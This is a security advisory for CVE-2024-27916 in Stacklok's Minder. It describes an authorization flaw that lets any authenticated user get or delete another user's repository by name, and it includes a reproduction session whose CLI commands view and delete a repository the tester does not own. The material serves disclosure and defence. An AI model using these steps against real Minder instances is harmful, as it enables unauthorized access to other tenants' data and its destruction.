CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
AI Score
Confidence
High
EPSS
Percentile
15.5%
A Minder user can use the endpoints listed in the issue title to access any repository in the DB, irrespective of who owns the repo and any permissions that user may have.
https://github.com/stacklok/minder/blob/e88e4b286e4bc04c03b0332a77961f085e1aa77f/database/query/repositories.sql#L22-L23
https://github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278
The DB query used here checks by repo owner, repo name and provider name (which is always “github”). These query values are not distinct for the particular user - as long as the user has valid credentials and a provider, they can set the repo owner/name to any value they want and the server will return information on this repo.
DeleteRepositoryByName
uses the same query and I have been able to delete another user’s repo using this technique.
The GetArtifactByName
endpoint also uses this DB query. I have not reproduced the behaviour with this endpoint due to a lack of a suitable test case, but I do not see anything in the implementation of the endpoint to prevent it being exploited.
Setup:
# show my identity
$ minder auth whoami
No config file present, using default values.
Here are your details:
+----------------------------------------------------+----------------------------------------------------+
| KEY | VALUE |
+----------------------------------------------------+----------------------------------------------------+
| Subject | c93cc12e-999d-49f4-9ee3-593fdfb39204 |
+----------------------------------------------------+----------------------------------------------------+
| Created At | 2024-02-26 15:53:29.228 +0000 |
| | UTC |
+----------------------------------------------------+----------------------------------------------------+
| Updated At | 2024-02-26 15:53:29.228 +0000 |
| | UTC |
+----------------------------------------------------+----------------------------------------------------+
| Minder Server | api.stacklok.com:443 |
+----------------------------------------------------+----------------------------------------------------+
| Project | dmjb / |
| | ca059552-7b8a-4c6e-918d-ca7e6cbd0bab |
+----------------------------------------------------+----------------------------------------------------+
# show that I have no repos registered
$ minder repo list
No config file present, using default values.
+----+---------+----------+-------------+-------+------+
| ID | PROJECT | PROVIDER | UPSTREAM ID | OWNER | NAME |
+----+---------+----------+-------------+-------+------+
# show details on one of Ozz's repos
$ minder repo get -n JAORMX/auditevent
No config file present, using default values.
{
"id": "a7e82080-9b6c-41f3-bc08-8e9442f8b2d2",
"context": {
"provider": "github",
"project": "b513f7f0-26dc-42e6-81a0-577df5489e62"
},
"owner": "JAORMX",
"name": "auditevent",
"repoId": "605597568",
"hookUrl": "https://api.github.com/repos/JAORMX/auditevent/hooks/464564107",
"deployUrl": "https://api.github.com/repos/JAORMX/auditevent/deployments",
"cloneUrl": "https://github.com/JAORMX/auditevent.git",
"isFork": true,
"createdAt": "2024-03-04T13:27:54.019356Z",
"updatedAt": "2024-03-04T13:27:54.019356Z",
"defaultBranch": "main"
}
# delete Ozz's repo
$ minder repo delete -n JAORMX/auditevent
No config file present, using default values.
Successfully deleted repo with name: JAORMX/auditevent
# Ozz's repo no longer exists
$ minder repo get -n JAORMX/auditevent
No config file present, using default values.
Message: Error getting repo by name
Details: NotFound means some requested entity (e.g., file or directory) was
not found.
Any user and project in a multi-tenant Minder instance.
github.com/stacklok/minder
github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278
github.com/stacklok/minder/blob/main/internal/controlplane/handlers_repositories.go#L257-L299
github.com/stacklok/minder/commit/45750b4e9fb2de33365758366e06c19e999bd2eb
github.com/stacklok/minder/security/advisories/GHSA-v627-69v2-xx37
nvd.nist.gov/vuln/detail/CVE-2024-27916
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
AI Score
Confidence
High
EPSS
Percentile
15.5%